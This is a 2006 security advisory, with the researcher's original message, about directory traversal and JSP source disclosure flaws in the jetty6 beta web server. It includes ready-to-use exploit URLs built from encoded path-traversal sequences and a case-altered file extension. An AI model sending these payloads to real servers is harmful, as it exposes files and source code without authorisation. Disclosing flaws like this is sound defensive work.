jetty6 Input Validation Flaws Let Remote Users Traverse the Directory
|
|
SecurityTracker Alert ID: 1016168
|
|
SecurityTracker URL: http://securitytracker.com/id?1016168
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 29 2006
|
Impact: Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 6.0.x (beta16)
|
Description: Ziv Kamir of GamaSec reported a vulnerability in jetty6. A remote user can view files on the target system.
The software does not properly validate user-supplied input. A remote user can supply a specially crafted request to view files
on target system that are located outside of the document directory. A remote user can also view script source code.
Some demonstration
exploit URLs are provided:
http://[target]:8080/test/%2e%2e%5c%2e%2e%5clogs/
http://[target]:8080/test/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/
http://[target]:8080
/test/snoop.jsP [notice the capital letter 'P']
The vendor was notified on May 15, 2006.
|
Impact: A remote user can view files on the target system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: jetty.mortbay.org/jetty6/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: Gama Sec <gs_lab@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 28 May 2006 13:53:11 -0700 (PDT)
From: Gama Sec <gs_lab@yahoo.com>
Subject: Jetty
|
Jetty
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
28/05/06
========================================
GamaSec - explore your vulnerabilities
========================================
==> Scan Your Web-site With GamaScan <==
-------------------------------------------------------
Application: Jetty web server
Web Site: jetty.mortbay.org/jetty6/
Versions: 6.0.x (beta16)
Platform: Windows
Credits:
########
##########################################
# == Ziv Kamir == #
# #
# GamaSec - explore your vulnerabilities #
# #
# Web : www.gamasec.com #
# #
# #
##########################################
---------------------
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
jetty6 is a new implementation of the popular Jetty HTTP Server and Servlet Container.
======
2) Bug
======
1.) A remote user can view files on the system located outside of the web document directory.
2.) The server discloses script source code to remote users.
===========
3) The Code
===========
http://[Target]:8080/test/%2e%2e%5c%2e%2e%5clogs/
http://[Target]:8080/test/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/
http://[Target]:8080/test/snoop.jsP (==> 'P')
===========
4) The Fix
===========
Date of Vendor Notification:
15/05/06
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages.
==============================================================================================
|
|
